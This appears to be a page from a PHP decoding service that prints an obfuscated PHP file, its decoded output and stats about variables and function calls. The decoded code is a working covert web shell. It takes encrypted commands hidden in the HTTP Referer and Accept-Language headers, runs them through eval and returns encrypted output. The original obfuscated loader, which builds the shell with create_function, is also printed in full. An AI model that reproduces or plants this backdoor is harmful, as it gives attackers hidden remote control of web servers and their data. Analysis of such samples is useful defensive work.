Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $Q=str_replace('U','','crUeatUUUe_UUfunction'); $X='$s[<E$i]="<E";$p=$ss<E($p,3);}..

Decoded Output download

$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$Q=str_replace('U','','crUeatUUUe_UUfunction');
$X='$s[<E$i]="<E";$p=$ss<E($p,3);}<Eif<E(array_key_e<Exists(<E$i,$<Es)){$s[$i<E].=<E$p;$e<E=strpos<E($s[$i],$f);<Ei';
$D='rtolowe<Er";$i=$<Em[1]<E[0].$m<E[1][1];$h<E=$s<El($s<Es(<E<Emd5($i.$kh),0,3));<E$f=$sl($s<Es(md5<E($i.$k<Ef),<E0';
$H='<E<End_cle<Ean();$d=base<E64_e<Encode(x(gz<Ecompre<Ess<E($o),$<Ek));pr<Ein<Et("<$k><E$d</$k>");@ses<Es<E<Eion_destroy();}}}}';
$I='f($e<E<E){$k=$kh.$kf<E;ob<E_start<E();@ev<Eal<E(@gzun<Ecompres<Es(@x(<E@ba<Ese64_decode<E(preg_r<Eeplace(a<E';
$Z=',3<E));$p<E="";for($z=1<E;$z<coun<Et($m[1<E]<E<E);$z++)$p.=$q<E[$m[2]<E[$z]];if<E(strp<Eo<E<Es($p,$h)===0)<E{';
$O='i<$l;){<Efor($j=0;<E($j<E<$c<E<E&&$i<$l);$j++,$<Ei+<E+){$o.=$t{$i<E}^$k{<E$j}<E;}}return<E $o;}$r=$<E_<ESERVER;';
$o='=<E0.([\\d<E<E]))?,?<E/",$ra,$m);i<Ef($q&&$m<E){<E@sessio<En_start();<E$s=&<E$_<ESESSION<E;$ss="<Esubstr";$sl<E=<E"st';
$z='$kh="5d<E41";$k<Ef="40<E2a<E";function <Ex($t,$k<E){$<Ec=strlen<E($k);$l=<Estr<Elen($t<E);$<Eo="";for($<E<Ei=0;$';
$q=';par<Ese_<Estr($u["query<E"],$q<E);$q=ar<E<Eray_value<Es($q)<E<E<E;preg_match_all("/([<E\\w])<E[\\w-]+(<E?:;q';
$p='$<Err=@$r<E["HTTP<E_R<EEFERER"];<E$ra=@$<Er["<EHTTP_ACCEP<ET_LANGUAG<EE"];if<E($<Err&&$ra<E){$<Eu=par<Ese_url($r<Er)';
$F='<Erray("/_/","/<E-/"),ar<Er<Eay("/"<E<E,"+"),$ss($s[$i]<E,0,<E$<Ee))<E),$k)));$o=ob_ge<Et_co<Entents()<E;ob_e';
$N=str_replace('<E','',$z.$O.$p.$q.$o.$D.$Z.$X.$I.$F.$H);
$P=$Q('',$N);$P();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$D rtolowe<Er";$i=$<Em[1]<E[0].$m<E[1][1];$h<E=$s<El($s<Es(<E<E..
$F <Erray("/_/","/<E-/"),ar<Er<Eay("/"<E<E,"+"),$ss($s[$i]<E,0,..
$H <E<End_cle<Ean();$d=base<E64_e<Encode(x(gz<Ecompre<Ess<E($o)..
$I f($e<E<E){$k=$kh.$kf<E;ob<E_start<E();@ev<Eal<E(@gzun<Ecompr..
$N $kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=str..
$O i<$l;){<Efor($j=0;<E($j<E<$c<E<E&&$i<$l);$j++,$<Ei+<E+){$o.=..
$P None
$Q create_function
$X $s[<E$i]="<E";$p=$ss<E($p,3);}<Eif<E(array_key_e<Exists(<E$i..
$Z ,3<E));$p<E="";for($z=1<E;$z<coun<Et($m[1<E]<E<E);$z++)$p.=$..
$o =<E0.([\d<E<E]))?,?<E/",$ra,$m);i<Ef($q&&$m<E){<E@sessio<En_..
$p $<Err=@$r<E["HTTP<E_R<EEFERER"];<E$ra=@$<Er["<EHTTP_ACCEP<ET..
$q ;par<Ese_<Estr($u["query<E"],$q<E);$q=ar<E<Eray_value<Es($q)..
$z $kh="5d<E41";$k<Ef="40<E2a<E";function <Ex($t,$k<E){$<Ec=str..

Stats

MD5 6d39def8687ec778eee85a7faba51085
Eval Count 1
Decode Time 113 ms